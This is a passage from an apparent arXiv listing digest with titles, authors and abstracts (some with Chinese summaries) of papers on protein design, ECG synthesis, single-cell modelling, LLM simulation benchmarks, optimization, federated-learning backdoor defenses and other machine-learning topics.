Abstract:Motivation: Generative models for protein backbone design have to simultaneously ensure geometric validity, sampling efficiency, and scalability to long sequences. However, most existing approaches rely on iterative refinement, quadratic attention mechanisms, or post-hoc geometry correction, leading to a persistent trade-off between computational efficiency and structural fidelity. Results: We present Physics-Informed Mamba (PI-Mamba), a generative model that enforces exact local covalent geometry by construction while enabling linear-time inference. PI-Mamba integrates a differentiable constraint-enforcement operator into a flow-matching framework and couples it with a Mamba-based state-space architecture. To improve optimisation stability and backbone realism, we introduce a spectral initialization derived from the Rouse polymer model and an auxiliary cis-proline awareness head. Across benchmark tasks, PI-Mamba achieves 0.0% local geometry violations and high designability (scTM = 0.91 \pm 0.03, n = 100), while scaling to proteins exceeding 2,000 residues on a single A5000 GPU (24 GB).
[AI-183] Complementarity-Preserving Generative Theory for Multimodal ECG Synthesis: A Quantum-Inspired Approach
【速读】:该论文旨在解决现有生成模型在合成多模态心电图(ECG)数据时存在的生理一致性不足问题,即虽然生成的ECG在视觉上合理,但在不同域(如时域、频域和时频域)之间缺乏生理上的互补性。其解决方案的关键在于提出一种互补性保持生成理论(Complementarity-Preserving Generative Theory, CPGT),强调生成过程必须显式保留跨域互补关系,而非简单地独立合成各模态;具体实现上采用量子启发的生成对抗网络Q-CFD-GAN,通过在复数潜在空间中建模多模态结构并引入约束机制以调控互信息、冗余度和形态一致性,从而显著提升合成数据的生理合理性与临床适用性。
链接: https://arxiv.org/abs/2603.26695
作者: Timothy Oladunni,Farouk Ganiyu-Adewumi,Clyde Baidoo,Kyndal Maclin
机构: 未知
类目: Signal Processing (eess.SP); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Image and Video Processing (eess.IV); Quantum Physics (quant-ph)
备注:
Abstract:Multimodal deep learning has substantially improved electrocardiogram (ECG) classification by jointly leveraging time, frequency, and time-frequency representations. However, existing generative models typically synthesize these modalities independently, resulting in synthetic ECG data that are visually plausible yet physiologically inconsistent across domains. This work establishes a Complementarity-Preserving Generative Theory (CPGT), which posits that physiologically valid multimodal signal generation requires explicit preservation of cross-domain complementarity rather than loosely coupled modality synthesis. We instantiate CPGT through Q-CFD-GAN, a quantum-inspired generative framework that models multimodal ECG structure within a complex-valued latent space and enforces complementarity-aware constraints regulating mutual information, redundancy, and morphological coherence. Experimental evaluation demonstrates that Q-CFD-GAN reduces latent embedding variance by 82%, decreases classifier-based plausibility error by 26.6%, and restores tri-domain complementarity from 0.56 to 0.91, while achieving the lowest observed morphology deviation (3.8%). These findings show that preserving multimodal information geometry, rather than optimizing modality-specific fidelity alone, is essential for generating synthetic ECG signals that remain physiologically meaningful and suitable for downstream clinical machine-learning applications.
[AI-184] Degrees Levels and Profiles of Contextuality
【速读】:该论文旨在解决传统方法中仅以单一数值表征系统整体上下文性(contextuality)的局限性问题,即无法揭示不同层次(level)下系统上下文性的动态变化特征。其解决方案的关键在于提出“上下文性轮廓”(contextuality profile)这一新概念,通过构建一个曲线关系来描述系统在不同变量组合层次(从1到N)下的上下文性程度,其中每个层次n对应于仅考虑最多n个变量的联合分布。该方法可与任意成熟的上下文性度量工具结合使用,并借助串联系统(concatenated systems)的构造策略实现对多种主流上下文性度量的系统性分析,从而提供更精细、层次化的上下文性刻画方式。
链接: https://arxiv.org/abs/2603.26692
作者: Ehtibar N. Dzhafarov,Victor H. Cervantes
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI); Probability (math.PR)
备注: 27 pages, 15 figures, 8 tables
Abstract:We introduce a new notion, that of a contextuality profile of a system. Rather than characterizing a system’s contextuality by a single number, its overall degree of contextuality, we show how it can be characterized by a curve relating degree of contextuality to the level at which the system is considered: \begin{array}{c|c|c|c|c|c|c|c} \textnormal{level} & 1 & \cdots & n-1 & n & n+1 & \cdots & N\\ \hline \textnormal{degree} & 0 & \cdots & 0 & d_n > 0 & d_{n+1}\geq d_n & \cdots & d_N\geq d_{N-1} \end{array}, where N is the maximum number of variables per system’s context. A system is represented at level n if one only considers the joint distributions with k\leq n variables, ignoring higher-order joint distributions. We show that the level-wise contextuality analysis can be used in conjunction with any well-constructed measure of contextuality. We present a method of concatenated systems to explore contextuality profiles systematically, and we apply it to the contextuality profiles for three major measures of contextuality proposed in the literature.
[AI-185] Lingshu-Cell: A generative cellular world model for transcriptome modeling toward virtual cells
【速读】:该论文旨在解决单细胞转录组学中细胞状态建模与扰动响应预测这一核心挑战,现有基础模型虽能提供强大的静态表征,但缺乏对细胞状态分布的显式建模能力,难以支持生成式模拟。其解决方案的关键在于提出Lingshu-Cell——一种掩码离散扩散模型(masked discrete diffusion model),该模型直接在与单细胞转录组数据稀疏性和非序列性兼容的离散token空间中操作,无需依赖基因筛选(如高变基因过滤或表达水平排序),即可捕获约18,000个基因范围内的全转录组表达依赖关系。通过联合嵌入细胞类型或供体身份与扰动信息,Lingshu-Cell能够实现对新组合的身份-扰动条件下的全转录组表达变化预测,在虚拟细胞挑战H1遗传扰动基准和人外周血单核细胞(PBMCs)细胞因子诱导响应预测任务中均达到领先性能,从而构建了一个灵活的细胞世界模型,为计算生物学中的扰动筛选与生物发现提供新范式。
链接: https://arxiv.org/abs/2603.25240
作者: Han Zhang,Guo-Hua Yuan,Chaohao Yuan,Tingyang Xu,Tian Bian,Hong Cheng,Wenbing Huang,Deli Zhao,Yu Rong
机构: 未知
类目: Quantitative Methods (q-bio.QM); Artificial Intelligence (cs.AI); Genomics (q-bio.GN)
备注:
Abstract:Modeling cellular states and predicting their responses to perturbations are central challenges in computational biology and the development of virtual cells. Existing foundation models for single-cell transcriptomics provide powerful static representations, but they do not explicitly model the distribution of cellular states for generative simulation. Here, we introduce Lingshu-Cell, a masked discrete diffusion model that learns transcriptomic state distributions and supports conditional simulation under perturbation. By operating directly in a discrete token space that is compatible with the sparse, non-sequential nature of single-cell transcriptomic data, Lingshu-Cell captures complex transcriptome-wide expression dependencies across approximately 18,000 genes without relying on prior gene selection, such as filtering by high variability or ranking by expression level. Across diverse tissues and species, Lingshu-Cell accurately reproduces transcriptomic distributions, marker-gene expression patterns and cell-subtype proportions, demonstrating its ability to capture complex cellular heterogeneity. Moreover, by jointly embedding cell type or donor identity with perturbation, Lingshu-Cell can predict whole-transcriptome expression changes for novel combinations of identity and perturbation. It achieves leading performance on the Virtual Cell Challenge H1 genetic perturbation benchmark and in predicting cytokine-induced responses in human PBMCs. Together, these results establish Lingshu-Cell as a flexible cellular world model for in silico simulation of cell states and perturbation responses, laying the foundation for a new paradigm in biological discovery and perturbation screening.
[AI-186] SimulCost: A Cost-Aware Benchmark and Toolkit for Automating Physics Simulations with LLMs
【速读】:该论文旨在解决当前大语言模型(Large Language Models, LLMs)在科学任务评估中忽视工具使用成本(如仿真时间与实验资源)的问题,导致传统指标(如pass@k)在现实预算约束下失效。其核心解决方案是提出SimulCost——首个面向物理仿真中参数调优的成本敏感型基准,通过量化LLM代理在单轮(初始猜测)和多轮(试错调整)模式下的准确率与计算成本,系统比较LLM方法与传统扫描策略的性能表现。关键创新在于构建了一个平台无关、解析定义的仿真成本模型,并涵盖12个来自流体动力学、固体力学和等离子体物理领域的模拟器,共4816个任务,揭示了LLM在高精度要求下初始猜测不可靠、多轮优化虽提升成功率但效率低于传统方法的局限性,从而为开发更经济的智能代理设计提供实证依据与可扩展工具链。
链接: https://arxiv.org/abs/2603.20253
作者: Yadi Cao,Sicheng Lai,Jiahe Huang,Yang Zhang,Zach Lawrence,Rohan Bhakta,Izzy F. Thomas,Mingyun Cao,Chung-Hao Tsai,Zihao Zhou,Yidong Zhao,Hao Liu,Alessandro Marinoni,Alexey Arefiev,Rose Yu
机构: 未知
类目: Computational Physics (physics.comp-ph); Artificial Intelligence (cs.AI); Distributed, Parallel, and Cluster Computing (cs.DC); Machine Learning (cs.LG)
备注:
Abstract:Evaluating LLM agents for scientific tasks has focused on token costs while ignoring tool-use costs like simulation time and experimental resources. As a result, metrics like pass@k become impractical under realistic budget constraints. To address this gap, we introduce SimulCost, the first benchmark targeting cost-sensitive parameter tuning in physics simulations. SimulCost compares LLM tuning cost-sensitive parameters against traditional scanning approach in both accuracy and computational cost, spanning 2,916 single-round (initial guess) and 1,900 multi-round (adjustment by trial-and-error) tasks across 12 simulators from fluid dynamics, solid mechanics, and plasma physics. Each simulator’s cost is analytically defined and platform-independent. Frontier LLMs achieve 46–64% success rates in single-round mode, dropping to 35–54% under high accuracy requirements, rendering their initial guesses unreliable especially for high accuracy tasks. Multi-round mode improves rates to 71–80%, but LLMs are 1.5–2.5x slower than traditional scanning, making them uneconomical choices. We also investigate parameter group correlations for knowledge transfer potential, and the impact of in-context examples and reasoning effort, providing practical implications for deployment and fine-tuning. We open-source SimulCost as a static benchmark and extensible toolkit to facilitate research on improving cost-aware agentic designs for physics simulations, and for expanding new simulation environments. Code and data are available at this https URL.
机器学习
[LG-0] mporal Credit Is Free
链接: https://arxiv.org/abs/2603.28750
作者: Aur Shalev Merin
类目: Machine Learning (cs.LG)
备注: 16 pages, 4 figures, 5 tables
Abstract:Recurrent networks do not need Jacobian propagation to adapt online. The hidden state already carries temporal credit through the forward pass; immediate derivatives suffice if you stop corrupting them with stale trace memory and normalize gradient scales across parameter groups. An architectural rule predicts when normalization is needed: \beta_2 is required when gradients must pass through a nonlinear state update with no output bypass, and unnecessary otherwise. Across ten architectures, real primate neural data, and streaming ML benchmarks, immediate derivatives with RMSprop match or exceed full RTRL, scaling to n = 1024 at 1000x less memory.
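A minimal numpy sketch of the recipe the abstract describes: a small RNN trained online with immediate derivatives only (the previous hidden state is treated as a constant, so no Jacobian propagates through time) and RMSprop-normalized updates. The hidden size, learning rate, and one-step recall task are my own choices, not the paper's benchmarks.

```python
import numpy as np

rng = np.random.default_rng(0)

# Small RNN trained online to recall the previous input (a one-step memory task).
H = 16
W_x = rng.normal(0, 0.5, H)                    # input weights (scalar input)
W_h = rng.normal(0, 1.0 / np.sqrt(H), (H, H))  # recurrent weights
W_o = np.zeros(H)                              # linear readout

params = [W_x, W_h, W_o]
v = [np.zeros_like(p) for p in params]         # RMSprop second moments
lr, rho, eps = 5e-3, 0.99, 1e-8

h = np.zeros(H)
x_prev = 0.0
losses = []
for t in range(5000):
    x = rng.uniform(-1.0, 1.0)
    target = x_prev                            # recall x_{t-1}
    h_new = np.tanh(W_h @ h + W_x * x)
    y = W_o @ h_new
    e = y - target
    losses.append(float(e * e))

    # Immediate derivatives only: the previous state h is treated as a constant,
    # so no Jacobian is propagated through time.
    g_o = 2 * e * h_new
    g_pre = 2 * e * W_o * (1 - h_new ** 2)     # gradient at the pre-activation
    grads = [g_pre * x, np.outer(g_pre, h), g_o]

    for p, vi, g in zip(params, v, grads):
        vi[:] = rho * vi + (1 - rho) * g * g   # RMSprop normalization
        p -= lr * g / (np.sqrt(vi) + eps)

    h, x_prev = h_new, x

early = float(np.mean(losses[:200]))
late = float(np.mean(losses[-500:]))
```

The loss falls well below the no-memory baseline (E[x^2] = 1/3) even though gradients never flow across time steps: the forward-carried hidden state does the temporal credit assignment, as the abstract claims.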
[LG-1] Stop Probing Start Coding: Why Linear Probes and Sparse Autoencoders Fail at Compositional Generalisation
链接: https://arxiv.org/abs/2603.28744
作者: Vitória Barin Pacela,Shruti Joshi,Isabela Camacho,Simon Lacoste-Julien,David Klindt
类目: Machine Learning (cs.LG)
备注:
Abstract:The linear representation hypothesis states that neural network activations encode high-level concepts as linear mixtures. However, under superposition, this encoding is a projection from a higher-dimensional concept space into a lower-dimensional activation space, and a linear decision boundary in the concept space need not remain linear after projection. In this setting, classical sparse coding methods with per-sample iterative inference leverage compressed sensing guarantees to recover latent factors. Sparse autoencoders (SAEs), on the other hand, amortise sparse inference into a fixed encoder, introducing a systematic gap. We show this amortisation gap persists across training set sizes, latent dimensions, and sparsity levels, causing SAEs to fail under out-of-distribution (OOD) compositional shifts. Through controlled experiments that decompose the failure, we identify dictionary learning – not the inference procedure – as the binding constraint: SAE-learned dictionaries point in substantially wrong directions, and replacing the encoder with per-sample FISTA on the same dictionary does not close the gap. An oracle baseline proves the problem is solvable with a good dictionary at all scales tested. Our results reframe the SAE failure as a dictionary learning challenge, not an amortisation problem, and point to scalable dictionary learning as the key open problem for sparse inference under superposition.
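The gap between per-sample iterative inference and a one-shot encoder is easy to reproduce in a toy superposition setting: ISTA with the true dictionary recovers sparse codes that an SAE-style encoder (a single soft-thresholded linear map, tied to the same dictionary) cannot. Dimensions and the sparsity level below are illustrative.

```python
import numpy as np

rng = np.random.default_rng(0)
d, m, k = 64, 256, 4            # activation dim, concept dim, sparsity (m > d)

D = rng.normal(0, 1, (d, m))
D /= np.linalg.norm(D, axis=0)  # unit-norm dictionary atoms

def sample_x():
    z = np.zeros(m)
    z[rng.choice(m, k, replace=False)] = rng.uniform(0.5, 1.5, k)
    return D @ z, z

def soft(u, lam):
    return np.sign(u) * np.maximum(np.abs(u) - lam, 0.0)

L = np.linalg.norm(D, 2) ** 2   # Lipschitz constant of the smooth part

def ista(x, lam=0.05, n_iter=200):
    """Per-sample iterative sparse inference with the true dictionary."""
    z = np.zeros(m)
    for _ in range(n_iter):
        z = soft(z + D.T @ (x - D @ z) / L, lam / L)
    return z

def amortised(x, lam=0.05):
    """SAE-style one-shot encoder: a single soft-thresholded linear map."""
    return soft(D.T @ x, lam)

errs_ista, errs_amort = [], []
for _ in range(50):
    x, z_true = sample_x()
    errs_ista.append(np.linalg.norm(ista(x) - z_true))
    errs_amort.append(np.linalg.norm(amortised(x) - z_true))
mean_ista, mean_amort = float(np.mean(errs_ista)), float(np.mean(errs_amort))
```

The one-shot encoder's errors come from atom cross-talk that a single threshold cannot remove; note this sketch gives both methods the true dictionary, whereas the paper's point is that SAE training additionally learns a worse dictionary.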
[LG-2] Rethinking Language Model Scaling under Transferable Hypersphere Optimization
链接: https://arxiv.org/abs/2603.28743
作者: Liliang Ren,Yang Liu,Yelong Shen,Weizhu Chen
类目: Machine Learning (cs.LG)
备注:
Abstract:Scaling laws for large language models depend critically on the optimizer and parameterization. Existing hyperparameter transfer laws are mainly developed for first-order optimizers, and they do not structurally prevent training instability at scale. Recent hypersphere optimization methods constrain weight matrices to a fixed-norm hypersphere, offering a promising alternative for more stable scaling. We introduce HyperP (Hypersphere Parameterization), the first framework for transferring optimal learning rates across model width, depth, training tokens, and Mixture-of-Experts (MoE) granularity under the Frobenius-sphere constraint with the Muon optimizer. We prove that weight decay is a first-order no-op on the Frobenius sphere, show that Depth-\mu P remains necessary, and find that the optimal learning rate follows the same data-scaling power law with the “magic exponent” 0.32 previously observed for AdamW. A single base learning rate tuned at the smallest scale transfers across all compute budgets under HyperP, yielding 1.58\times compute efficiency over a strong Muon baseline at 6\times 10^{21} FLOPs. Moreover, HyperP delivers transferable stability: all monitored instability indicators, including Z-values, output RMS, and activation outliers, remain bounded and non-increasing under training FLOPs scaling. We also propose SqrtGate, an MoE gating mechanism derived from the hypersphere constraint that preserves output RMS across MoE granularities for improved granularity scaling, and show that hypersphere optimization enables substantially larger auxiliary load-balancing weights, yielding both strong performance and good expert balance. We release our training codebase at this https URL.
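The Frobenius-sphere constraint and the weight-decay observation can be illustrated with a simple norm retraction (the sizes and step are made up; this is not the paper's Muon update). With a pure projection, decay-then-project is exactly a no-op, which is consistent with the paper's first-order statement:

```python
import numpy as np

rng = np.random.default_rng(0)

def project_frobenius(W, radius):
    """Retract a weight matrix onto the Frobenius sphere of a given radius."""
    return W * (radius / np.linalg.norm(W))   # Frobenius norm by default

radius = 4.0
W = project_frobenius(rng.normal(0, 1, (32, 32)), radius)

# One hypothetical optimizer step followed by retraction back to the sphere.
G = rng.normal(0, 1, (32, 32))                # stand-in for an update direction
W_next = project_frobenius(W - 0.01 * G, radius)

# Weight decay only rescales W, so decay followed by projection recovers W exactly.
W_decayed = project_frobenius(0.9 * W, radius)
```

Keeping every weight matrix at a fixed Frobenius norm is what bounds the instability indicators the abstract monitors, independent of the learning-rate schedule.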
[LG-3] Expectation Error Bounds for Transfer Learning in Linear Regression and Linear Neural Networks
Link: https://arxiv.org/abs/2603.28739
Authors: Meitong Liu,Christopher Jung,Rui Li,Xue Feng,Han Zhao
Subjects: Machine Learning (cs.LG); Machine Learning (stat.ML)
Comments:
Abstract:In transfer learning, the learner leverages auxiliary data to improve generalization on a main task. However, the precise theoretical understanding of when and how auxiliary data help remains incomplete. We provide new insights on this issue in two canonical linear settings: ordinary least squares regression and under-parameterized linear neural networks. For linear regression, we derive exact closed-form expressions for the expected generalization error with bias-variance decomposition, yielding necessary and sufficient conditions for auxiliary tasks to improve generalization on the main task. We also derive globally optimal task weights as outputs of solvable optimization programs, with consistency guarantees for empirical estimates. For linear neural networks with shared representations of width q \leq K, where K is the number of auxiliary tasks, we derive a non-asymptotic expectation bound on the generalization error, yielding the first non-vacuous sufficient condition for beneficial auxiliary learning in this setting, as well as principled directions for task weight curation. We achieve this by proving a new column-wise low-rank perturbation bound for random matrices, which improves upon existing bounds by preserving fine-grained column structures. Our results are verified on synthetic data simulated with controlled parameters.
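The role of task weights described above can be illustrated with a hypothetical 1-D example (not the paper's estimator): pooled least squares where a weight w controls how much an auxiliary task's data influences the main-task slope estimate.

```python
# Toy weighted pooled least squares; data values are invented.

def weighted_ols(main, aux, w):
    """Pooled 1-D least squares: beta = sum(w_i * x * y) / sum(w_i * x^2)."""
    num = sum(x * y for x, y in main) + w * sum(x * y for x, y in aux)
    den = sum(x * x for x, _ in main) + w * sum(x * x for x, _ in aux)
    return num / den

main = [(1.0, 2.0), (2.0, 4.1)]   # main task: slope near 2
aux  = [(1.0, 2.2), (3.0, 5.8)]   # related auxiliary task: slope near 2

beta_alone  = weighted_ols(main, [], 0.0)   # main-task-only estimate
beta_pooled = weighted_ols(main, aux, 0.5)  # auxiliary data down-weighted
```

Whether `beta_pooled` beats `beta_alone` in expectation is exactly the kind of condition the paper characterises.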
[LG-4] See it to Place it: Evolving Macro Placements with Vision-Language Models
Link: https://arxiv.org/abs/2603.28733
Authors: Ikechukwu Uchendu,Swati Goel,Karly Hou,Ebrahim Songhori,Kuang-Huei Lee,Joe Wenjie Jiang,Vijay Janapa Reddi,Vincent Zhuang
Subjects: Machine Learning (cs.LG)
Comments: 31 pages, 11 figures, 14 tables
Abstract:We propose using Vision-Language Models (VLMs) for macro placement in chip floorplanning, a complex optimization task that has recently shown promising advancements through machine learning methods. Because human designers rely heavily on spatial reasoning to arrange components on the chip canvas, we hypothesize that VLMs with strong visual reasoning abilities can effectively complement existing learning-based approaches. We introduce VeoPlace (Visual Evolutionary Optimization Placement), a novel framework that uses a VLM, without any fine-tuning, to guide the actions of a base placer by constraining them to subregions of the chip canvas. The VLM proposals are iteratively optimized through an evolutionary search strategy with respect to resulting placement quality. On open-source benchmarks, VeoPlace outperforms the best prior learning-based approach on 9 of 10 benchmarks with peak wirelength reductions exceeding 32%. We further demonstrate that VeoPlace generalizes to analytical placers, improving DREAMPlace performance on all 8 evaluated benchmarks with gains up to 4.3%. Our approach opens new possibilities for electronic design automation tools that leverage foundation models to solve complex physical design problems.
[LG-5] GPU-Accelerated Optimization of Transformer-Based Neural Networks for Real-Time Inference
Link: https://arxiv.org/abs/2603.28708
Authors: Soutrik Mukherjee,Sangwhan Cha
Subjects: Machine Learning (cs.LG); Distributed, Parallel, and Cluster Computing (cs.DC)
Comments: 10 pages, 8 figures, 15 tables
Abstract:This paper presents the design and evaluation of a GPU-accelerated inference pipeline for transformer models using NVIDIA TensorRT with mixed-precision optimization. We evaluate BERT-base (110M parameters) and GPT-2 (124M parameters) across batch sizes from 1 to 32 and sequence lengths from 32 to 512. The system achieves up to 64.4x speedup over CPU baselines, sub-10 ms latency for single-sample inference, and a 63 percent reduction in memory usage. We introduce a hybrid precision strategy that preserves FP32 for numerically sensitive operations such as softmax and layer normalization, while applying FP16 to linear layers. This approach maintains high numerical fidelity (cosine similarity = 0.9998 relative to baseline outputs) and eliminates NaN instability. The pipeline is implemented as a modular, containerized system that enables reproducible benchmarking across more than 360 configurations. Cross-GPU validation on an NVIDIA A100 shows consistent FP16 speedup ratios between 1.84x and 2.00x, along with stable numerical behavior. Downstream evaluation on SST-2 demonstrates no accuracy degradation under hybrid precision. Validation on WikiText-2 shows that random inputs underestimate NaN instability by up to 6x for full FP16, while confirming the robustness of the hybrid approach (0.0 percent NaN, cosine similarity = 0.9998). These results provide a detailed characterization of performance and accuracy trade-offs across GPU architectures and offer practical guidance for deploying transformer models in latency-critical environments.
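The numerical-fidelity check reported above (cosine similarity of 0.9998, zero NaNs) can be sketched as follows; this is our assumed form of the metric, with made-up output vectors standing in for real FP32 and FP16 runs.

```python
# Fidelity metrics for comparing baseline and reduced-precision outputs.
import math

def cosine_similarity(a, b):
    """Cosine similarity between two output vectors; 1.0 means identical direction."""
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb)

def nan_fraction(v):
    """Fraction of NaN entries, the instability indicator scanned for."""
    return sum(1 for x in v if math.isnan(x)) / len(v)

fp32_out = [0.12, -1.40, 3.30, 0.07]
fp16_out = [0.1201, -1.3998, 3.3008, 0.0699]  # hypothetical half-precision run
sim = cosine_similarity(fp32_out, fp16_out)
```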
[LG-6] Subspace Optimization for Backpropagation-Free Continual Test-Time Adaptation
Link: https://arxiv.org/abs/2603.28678
Authors: Damian Sójka,Sebastian Cygert,Marc Masana
Subjects: Machine Learning (cs.LG)
Comments:
Abstract:We introduce PACE, a backpropagation-free continual test-time adaptation system that directly optimizes the affine parameters of normalization layers. Existing derivative-free approaches struggle to balance runtime efficiency with learning capacity, as they either restrict updates to input prompts or require continuous, resource-intensive adaptation regardless of domain stability. To address these limitations, PACE leverages the Covariance Matrix Adaptation Evolution Strategy with the Fastfood projection to optimize high-dimensional affine parameters within a low-dimensional subspace, leading to superior adaptive performance. Furthermore, we enhance the runtime efficiency by incorporating an adaptation stopping criterion and a domain-specialized vector bank to eliminate redundant computation. Our framework achieves state-of-the-art accuracy across multiple benchmarks under continual distribution shifts, reducing runtime by over 50% compared to existing backpropagation-free methods.
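The subspace trick at the heart of such methods can be shown with a toy sketch (not PACE itself): a low-dimensional latent vector is mapped to many high-dimensional parameters through a fixed random projection, so a derivative-free optimizer only ever searches in the small space. Plain random search stands in for CMA-ES, the Gaussian matrix for the Fastfood projection, and a quadratic loss for the adaptation objective.

```python
# Derivative-free search in a d-dim subspace of a D-dim parameter space.
import random

random.seed(0)
D, d = 50, 3
P = [[random.gauss(0, 1) for _ in range(d)] for _ in range(D)]  # fixed projection
target = [0.5] * D  # hypothetical "good" affine parameters

def expand(z):
    """Map the low-dimensional search vector to full parameters: theta = P z."""
    return [sum(P[i][j] * z[j] for j in range(d)) for i in range(D)]

def loss(z):
    theta = expand(z)
    return sum((t - g) ** 2 for t, g in zip(theta, target))

best_z = [0.0] * d
best = loss(best_z)
for _ in range(500):
    # mutate only the d-dimensional latent, never the D parameters directly
    cand = [z + random.gauss(0, 0.1) for z in best_z]
    l = loss(cand)
    if l < best:
        best, best_z = l, cand
```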
[LG-7] FL-PBM: Pre-Training Backdoor Mitigation for Federated Learning
Link: https://arxiv.org/abs/2603.28673
Authors: Osama Wehbi,Sarhad Arisdakessian,Omar Abdel Wahab,Azzam Mourad,Hadi Otrok,Jamal Bentahar
Subjects: Machine Learning (cs.LG); Cryptography and Security (cs.CR); Distributed, Parallel, and Cluster Computing (cs.DC)
Comments: 12 pages, 3 figures, 1 table, 2 algorithms, Regular Journal Paper
Abstract:Backdoor attacks pose a significant threat to the integrity and reliability of Artificial Intelligence (AI) models, enabling adversaries to manipulate model behavior by injecting poisoned data with hidden triggers. These attacks can lead to severe consequences, especially in critical applications such as autonomous driving, healthcare, and finance. Detecting and mitigating backdoor attacks is crucial across all phases of a model’s lifecycle, including pre-training, in-training, and post-training. In this paper, we propose Pre-Training Backdoor Mitigation for Federated Learning (FL-PBM), a novel defense mechanism that proactively filters poisoned data on the client side before model training in a federated learning (FL) environment. The approach consists of four stages: (1) inserting a benign trigger into the data to establish a controlled baseline, (2) applying Principal Component Analysis (PCA) to extract discriminative features and assess the separability of the data, (3) performing Gaussian Mixture Model (GMM) clustering to identify potentially malicious data samples based on their distribution in the PCA-transformed space, and (4) applying a targeted blurring technique to disrupt potential backdoor triggers. Together, these steps ensure that suspicious data is detected early and sanitized effectively, thereby minimizing the influence of backdoor triggers on the global model. Experimental evaluations on image-based datasets demonstrate that FL-PBM reduces attack success rates by up to 95% compared to baseline federated learning (FedAvg) and by 30 to 80% relative to state-of-the-art defenses (RDFL and LPSF). At the same time, it maintains over 90% clean model accuracy in most experiments, achieving better mitigation without degrading model performance.
[LG-8] Mitigating Backdoor Attacks in Federated Learning Using PPA and MiniMax Game Theory
Link: https://arxiv.org/abs/2603.28652
Authors: Osama Wehbi,Sarhad Arisdakessian,Omar Abdel Wahab,Anderson Avila,Azzam Mourad,Hadi Otrok
Subjects: Machine Learning (cs.LG); Cryptography and Security (cs.CR); Distributed, Parallel, and Cluster Computing (cs.DC); Computer Science and Game Theory (cs.GT)
Comments: 12 pages, 4 images, 2 tables, 2 algorithms, Regular Journal Paper
Abstract:Federated Learning (FL) is witnessing wider adoption due to its ability to benefit from large amounts of scattered data while preserving privacy. However, despite its advantages, federated learning suffers from several setbacks that directly impact the accuracy and the integrity of the global model it produces. One of these setbacks is the presence of malicious clients who actively try to harm the global model by injecting backdoor data into their local models while trying to evade detection. The objective of such clients is to trick the global model into making false predictions during inference, thereby compromising the integrity and trustworthiness of the global model on which honest stakeholders rely. To mitigate such mischievous behavior, we propose FedBBA (Federated Backdoor and Behavior Analysis). The proposed model aims to dampen the effect of such clients on the final accuracy, creating more resilient federated learning environments. We engineer our approach through the combination of (1) a reputation system to evaluate and track client behavior, (2) an incentive mechanism to reward honest participation and penalize malicious behavior, and (3) game theoretical models with projection pursuit analysis (PPA) to dynamically identify and minimize the impact of malicious clients on the global model. Extensive simulations on the German Traffic Sign Recognition Benchmark (GTSRB) and Belgium Traffic Sign Classification (BTSC) datasets demonstrate that FedBBA reduces the backdoor attack success rate to approximately 1.1%–11% across various attack scenarios, significantly outperforming state-of-the-art defenses like RDFL and RoPE, which yielded attack success rates between 23% and 76%, while maintaining high normal task accuracy (~95%–98%).
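The reputation component (1) above can be sketched minimally; this is our own illustration, far simpler than the paper's game-theoretic machinery: decay a client's reputation when its update is flagged, and weight aggregation by reputation so flagged clients lose influence.

```python
# Toy reputation-weighted aggregation; client names and values are invented.

def update_reputation(rep, flagged, gain=0.1, penalty=0.5):
    """Reward unflagged clients, penalise flagged ones, clamped to [0, 1]."""
    return {c: min(1.0, r + gain) if c not in flagged else max(0.0, r - penalty)
            for c, r in rep.items()}

def aggregate(updates, rep):
    """Reputation-weighted average of client update vectors."""
    total = sum(rep[c] for c in updates)
    dim = len(next(iter(updates.values())))
    return [sum(rep[c] * updates[c][i] for c in updates) / total
            for i in range(dim)]

rep = {"a": 0.8, "b": 0.8, "mal": 0.8}
rep = update_reputation(rep, flagged={"mal"})   # "mal" was caught this round
updates = {"a": [1.0, 1.0], "b": [1.0, 1.0], "mal": [9.0, 9.0]}
global_update = aggregate(updates, rep)          # pulled toward honest clients
```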
[LG-9] Constructing Composite Features for Interpretable Music-Tagging ICASSP2026
Link: https://arxiv.org/abs/2603.28644
Authors: Chenhao Xue,Weitao Hu,Joyraj Chakraborty,Zhijin Guo,Kang Li,Tianyu Shi,Martin Reed,Nikolaos Thomos
Subjects: Sound (cs.SD); Machine Learning (cs.LG); Multimedia (cs.MM)
Comments: 5 pages, 8 figures, accepted at ICASSP 2026
Abstract:Combining multiple audio features can improve the performance of music tagging, but common deep learning-based feature fusion methods often lack interpretability. To address this problem, we propose a Genetic Programming (GP) pipeline that automatically evolves composite features by mathematically combining base music features, thereby capturing synergistic interactions while preserving interpretability. This approach provides representational benefits similar to deep feature fusion without sacrificing interpretability. Experiments on the MTG-Jamendo and GTZAN datasets demonstrate consistent improvements compared to state-of-the-art systems across base feature sets at different abstraction levels. It should be noted that most of the performance gains are noticed within the first few hundred GP evaluations, indicating that effective feature combinations can be identified under modest search budgets. The top evolved expressions include linear, nonlinear, and conditional forms, with various low-complexity solutions at top performance aligned with parsimony pressure to prefer simpler expressions. Analyzing these composite features further reveals which interactions and transformations tend to be beneficial for tagging, offering insights that remain opaque in black-box deep models.
[LG-10] LACE: Loss-Adaptive Capacity Expansion for Continual Learning
Link: https://arxiv.org/abs/2603.28611
Authors: Shivnath Tathe
Subjects: Machine Learning (cs.LG)
Comments:
Abstract:Fixed representational capacity is a fundamental constraint in continual learning: practitioners must guess an appropriate model width before training, without knowing how many distinct concepts the data contains. We propose LACE (Loss-Adaptive Capacity Expansion), a simple online mechanism that expands a model’s representational capacity during training by monitoring its own loss signal. When sustained loss deviation exceeds a threshold - indicating that the current capacity is insufficient for newly encountered data - LACE adds new dimensions to the projection layer and trains them jointly with existing parameters. Across synthetic and real-data experiments, LACE triggers expansions exclusively at domain boundaries (100% boundary precision, zero false positives), matches the accuracy of a large fixed-capacity model while starting from a fraction of its dimensions, and produces adapter dimensions that are collectively critical to performance (3% accuracy drop when all adapters removed). We further demonstrate unsupervised domain separation in GPT-2 activations via layer-wise clustering, showing a U-shaped separability curve across layers that motivates adaptive capacity allocation in deep networks. LACE requires no labels, no replay buffers, and no external controllers, making it suitable for on-device continual learning under resource constraints.
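The loss-monitoring trigger described above can be sketched in a few lines; names and thresholds here are ours, not the paper's: track a running loss baseline and signal an expansion when the loss stays above baseline plus a threshold for several consecutive steps, as happens at a domain boundary.

```python
# Toy expansion trigger on a loss stream; the loss values are invented.

def expansion_points(losses, patience=3, threshold=0.5, alpha=0.1):
    """Return the steps at which sustained loss deviation would add capacity."""
    baseline, high, points = losses[0], 0, []
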